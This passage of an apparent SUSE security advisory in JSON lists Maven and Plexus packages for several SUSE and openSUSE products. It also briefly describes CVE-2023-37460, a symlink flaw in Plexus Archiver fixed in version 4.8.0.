"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP Applications 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Manager Server 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "SUSE Enterprise Storage 7.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-3.6.1-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-archiver-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch"
},
"product_reference": "maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-assembly-plugin-3.6.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-assembly-plugin-3.6.0-150200.3.7.2.noarch"
},
"product_reference": "maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch"
},
"product_reference": "maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch"
},
"product_reference": "maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch"
},
"product_reference": "maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-plugin-3.6.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-plugin-3.6.0-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-tree-3.2.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-tree-3.2.1-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch"
},
"product_reference": "maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-enforcer-3.4.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-enforcer-3.4.1-150200.3.7.2.noarch"
},
"product_reference": "maven-enforcer-3.4.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-enforcer-api-3.4.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-enforcer-api-3.4.1-150200.3.7.2.noarch"
},
"product_reference": "maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch"
},
"product_reference": "maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch"
},
"product_reference": "maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-enforcer-rules-3.4.1-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-enforcer-rules-3.4.1-150200.3.7.2.noarch"
},
"product_reference": "maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-plugin-3.9.0-150200.3.7.5.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-plugin-3.9.0-150200.3.7.5.noarch"
},
"product_reference": "maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch"
},
"product_reference": "maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch"
},
"product_reference": "maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-script-ant-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-script-ant-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-script-ant-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "maven-script-beanshell-3.9.0-150200.3.7.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:maven-script-beanshell-3.9.0-150200.3.7.3.noarch"
},
"product_reference": "maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-9.6-150200.3.11.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:objectweb-asm-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "objectweb-asm-javadoc-9.6-150200.3.11.3.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:objectweb-asm-javadoc-9.6-150200.3.11.3.noarch"
},
"product_reference": "objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:plexus-archiver-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch"
},
"product_reference": "plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-2.14.2-150200.3.9.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:plexus-compiler-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-extras-2.14.2-150200.3.9.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:plexus-compiler-extras-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch as component of openSUSE Leap 15.5",
"product_id": "openSUSE Leap 15.5:plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch"
},
"product_reference": "plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch",
"relates_to_product_reference": "openSUSE Leap 15.5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-37460"
}
],
"notes": [
{
"category": "general",
"text": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Enterprise Storage 7.1:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Enterprise Storage 7.1:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Enterprise Storage 7.1:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
